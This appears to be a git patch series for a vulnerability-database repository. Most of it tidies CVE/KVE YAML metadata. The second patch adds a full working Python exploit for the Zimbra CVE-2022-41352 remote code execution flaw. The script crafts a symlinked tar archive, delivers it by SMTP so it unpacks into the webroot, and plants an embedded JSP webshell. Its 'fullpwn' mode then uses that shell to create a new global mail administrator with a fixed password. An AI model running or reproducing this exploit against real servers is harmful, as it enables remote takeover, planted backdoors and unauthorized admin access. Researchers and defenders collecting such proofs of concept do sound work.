cnvd-id: None kve-id: None - tags: cve2022,拒绝服务 \ No newline at end of file + tags: cve2022, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0714.yaml b/cve/vim/2022/yaml/CVE-2022-0714.yaml index b9f11b5f..8c7ea56f 100644 --- a/cve/vim/2022/yaml/CVE-2022-0714.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0714.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-0714 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0729.yaml b/cve/vim/2022/yaml/CVE-2022-0729.yaml index e55f8edc..6b6c5a0c 100644 --- a/cve/vim/2022/yaml/CVE-2022-0729.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0729.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0729 - cwe-id: CWE-119,CWE-823 + cwe-id: CWE-119, CWE-823 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-1771.yaml b/cve/vim/2022/yaml/CVE-2022-1771.yaml index a82ca61e..b5bfc873 100644 --- a/cve/vim/2022/yaml/CVE-2022-1771.yaml +++ b/cve/vim/2022/yaml/CVE-2022-1771.yaml @@ -11,9 +11,9 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-1771 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H - cvss-score: 漏洞评分 + cvss-score: 5.5 cve-id: CVE-2022-1771 cwe-id: CWE-674 cnvd-id: None kve-id: None - tags: cve2022,缓冲区溢出 \ No newline at end of file + tags: cve2022, 缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2206.yaml b/cve/vim/2022/yaml/CVE-2022-2206.yaml index 47f8d6b0..387d0d77 100644 --- a/cve/vim/2022/yaml/CVE-2022-2206.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2206.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2257.yaml b/cve/vim/2022/yaml/CVE-2022-2257.yaml index 7b71e39a..7e823bc2 100644 --- a/cve/vim/2022/yaml/CVE-2022-2257.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2257.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2264.yaml b/cve/vim/2022/yaml/CVE-2022-2264.yaml index 9df97e7a..0c326cac 100644 --- a/cve/vim/2022/yaml/CVE-2022-2264.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2264.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-122 cnvd-id: None kve-id: None - tags: cve2022,缓冲区溢出 \ No newline at end of file + tags: cve2022, 缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2598.yaml b/cve/vim/2022/yaml/CVE-2022-2598.yaml index 93a97db3..cdd674e8 100644 --- a/cve/vim/2022/yaml/CVE-2022-2598.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2598.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-475 cnvd-id: None kve-id: None - tags: cve2022,拒绝服务 \ No newline at end of file + tags: cve2022, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-1127.yaml b/cve/vim/2023/yaml/CVE-2023-1127.yaml index cd88a16b..cb16afed 100644 --- a/cve/vim/2023/yaml/CVE-2023-1127.yaml +++ b/cve/vim/2023/yaml/CVE-2023-1127.yaml @@ -4,7 +4,7 @@ info: name: Vim是一款基于UNIX平台的编辑器。 severity: high description: | - GitHub存储库vim/vim在9.0.1367版本存在除以零漏洞。 + vim在9.0.1367版本存在除以零漏洞。 scope-of-influence: vim < 9.0.1367 reference: diff --git a/cve/webmin/2019/yaml/CVE-2019-12840.yaml b/cve/webmin/2019/yaml/CVE-2019-12840.yaml index 1112f170..3eddcac3 100644 --- a/cve/webmin/2019/yaml/CVE-2019-12840.yaml +++ b/cve/webmin/2019/yaml/CVE-2019-12840.yaml @@ -10,7 +10,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-12840 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-12840 cwe-id: CWE-78 diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml index 0eab256c..1a215723 100644 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml +++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml @@ -1,6 +1,5 @@ id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 +source: https://github.com/L0ading-x/cve-2022-23131 info: name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 severity: critical diff --git a/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml b/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml index 8101adfa..b4bed45f 100644 --- a/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml +++ b/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml @@ -17,4 +17,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0231 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml index d3512bf6..9a2e69d5 100644 --- a/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml +++ b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0206 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml index 509a3d1f..d52ead9b 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0207 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml index df9264e5..bbcd86e9 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0210 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml index 0e9b92df..bf1585c3 100644 --- a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml +++ b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0205 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index ea925499..819961a3 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -8,7 +8,6 @@ cve: - CVE-2021-42327 - CVE-2022-0995 - CVE-2022-1015 - - CVE-2022-2602 - CVE-2022-2586 - CVE-2021-33624 - CVE-2020-27194 -- Gitee From c438ee36a94fd82c81cf2fe591e4145c1c92f47a Mon Sep 17 00:00:00 2001 From: lastre3et Date: Tue, 9 May 2023 11:34:18 +0800 Subject: [PATCH 2/2] Update POC --- .../2022/CVE-2022-41352/CVE-2022-41352.py | 236 ++++++++++++++++++ 1 file changed, 236 insertions(+) create mode 100644 cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py diff --git a/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py new file mode 100644 index 00000000..f447f3d2 --- /dev/null +++ b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py @@ -0,0 +1,236 @@ +#!/usr/bin/env python3 + +import sys +import smtplib +import argparse +from time import sleep +from email.mime.multipart import MIMEMultipart +from email.mime.application import MIMEApplication +from email.mime.text import MIMEText +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# CONFIGURATION +#---------------------------------- +TARGET = 'mail.test.org' +WEBSHELL_PATH = '/public/jsp' +WEBSHELL_NAME = 'Startup1_3.jsp' +ATTACHMENT = 'payload.tar' +SENDER = 'test@test.org' +RECIPIENT = 'admin@test.org' + +EMAIL_SUBJECT = 'CVE-2022-41352' +EMAIL_BODY = 'Just testing.

Don\'t mind me.

' +#---------------------------------- + +# Only change this if zimbra was not installed in the default location +UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' + + +def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): + # Block 1 + link = lnk.encode() + mode = b'0000777\x00' # link permissions + ouid = b'0001745\x00' # octal uid (997) + ogid = b'0001745\x00' # octal gid + lnsz = b'00000000000\x00' # file size (link = 0) + lmod = b'14227770134\x00' # last modified (octal unix) + csum = b' ' # checksum = 8 blanks + type = b'2' # type (link = 2) + targ = payload_path.encode() # link target + magi = b'ustar \x00' # ustar magic bytes + version + ownu = b'zimbra' # user owner + owng = b'zimbra' # group owner + vers = b'\x00'*8 + b'\x00'* 8 # device major and minor + pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) + + raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod + raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref + # calculate and insert checksum + csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] + raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 + # pad block to 512 + raw_b1 += b'\00'*(512-len(raw_b1)) + + # Block 2 + mode = b'0000644\x00' # file permissions + file = f'{lnk}/{payload_name}'.encode() + flsz = oct(len(payload))[2:] # file size + csum = b' ' # checksum = 8 blanks + type = b'0' # type (file = 0) + targ = b'\x00'*100 # link target = none + + raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod + raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref + # calculate and insert checksum + csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] + raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 + # pad block to 512 + raw_b2 += b'\00'*(512-len(raw_b2)) + + + # Assemble + raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) + raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks + + return raw_tar + +# Update this if you want to use a legit email account for sending the payload +def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): + msg = MIMEMultipart() + msg['Subject'] = subject + msg['From'] = sender + msg['To'] = recipient + + message = MIMEText(body, 'html') + msg.attach(message) + + att = MIMEApplication(attachment) + att.add_header('Content-Disposition', 'attachment', filename=attachment_name) + msg.attach(att) + + try: + print(f'>>> Sending payload') + smtp_server = smtplib.SMTP(target,25) + smtp_server.sendmail(sender, recipient, msg.as_string()) + print(f'>>> Payload delivered') + except Exception as e: + print(f'[!] Failed to send the mail: {e}') + sys.exit(1) + +def verify_upload(target, shell, path): + print(f'>>> Verifying upload to {path}/{shell} ...') + sleep(5) # give the server time to process the email + resp = requests.get(f'https://{target}{path}/{shell}', verify=False) + if resp.status_code == 200: + print(f'>>> [PWNED] Upload successful!') + else: + print(f'>>> Upload unsuccesful :(') + sys.exit(1) + +def create_new_zimbra_admin(target, shell, path): + url = f'https://{target}' + pw = 'Pwn1ng_Z1mbra_!s_fun' + print(f'>>> Adding a new global administrator') + if (input(f'>>> Are you sure you want to continue? (yN): ') != 'y'): + sys.exit(0) + admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') + r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) + r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) + + print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') + print(f'>>> Email : {admin}') + print(f'>>> Password : {pw}') + + +def main(args): + global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY + + # Kali JSP WebShell + payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' + + # Using this instead of argparse default values to allow easy manual configuration as well + if args.payload: + try: + with open(args.payload, 'rb') as f: + payload = f.read() + except Exception as e: + print(f'Failed to read {args.payload}: {e}') + sys.exit(1) + print(f'>>> Using custom payload from: {args.payload}') + else: + print(f'>>> Using default payload: JSP Webshell') + if args.path: + WEBSHELL_PATH = args.path + if args.file: + WEBSHELL_NAME = args.file + if args.attach: + ATTACHMENT = args.attach + + tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) + + print(f'>>> Assembled payload attachment: {ATTACHMENT}') + print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') + if args.mode == 'manual': + with open(ATTACHMENT, 'wb') as f: + f.write(tar) + print(f'>>> Attachment saved locally.') + sys.exit(0) + + if args.target: + TARGET = args.target + + print(f'>>> Targeting {TARGET}') + + if args.sender: + SENDER = args.sender + if args.recip: + RECIPIENT = args.recip + if args.subject: + EMAIL_SUBJECT = args.subject + if args.body: + try: + with open(args.body, 'rb') as f: + EMAIL_BODY = f.read().decode() + except Exception as e: + print(f'Failed to read {args.body}: {e}') + sys.exit(1) + print(f'>>> Using custom email body from: {args.body}') + + + smtp_send_file( TARGET, + SENDER, + RECIPIENT, + EMAIL_SUBJECT, + EMAIL_BODY, + tar, + ATTACHMENT ) + + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) + + print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') + if args.mode == 'auto': + sys.exit(0) + + if args.payload: + print(f'>>> (!) "fullpwn" depends on the default JSP webshell - won\'t create the admin account') + else: + create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) + + sys.exit(0) + +if __name__ == '__main__': + epi = ''' +Alternatively, edit the script to change the default configuration. + +The available modes are: + + manual : Only create the payload - you have to deploy the payload yourself. + auto : Create a webshell and deploy it via SMTP. + fullpwn : After deploying a webshell, add a new global mail administrator. +''' + + p = argparse.ArgumentParser( + description = 'CVE-2022-41352 Zimbra RCE', + formatter_class = argparse.RawDescriptionHelpFormatter, + epilog = epi + ) + p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') + + p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') + p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') + p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') + p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') + p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') + p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') + p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') + p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') + p.add_argument('--body', required=False, metavar='', help=f'file containing the html content for the email body (default: "{EMAIL_BODY}")') + + args = p.parse_args() + + main(args) \ No newline at end of file -- Gitee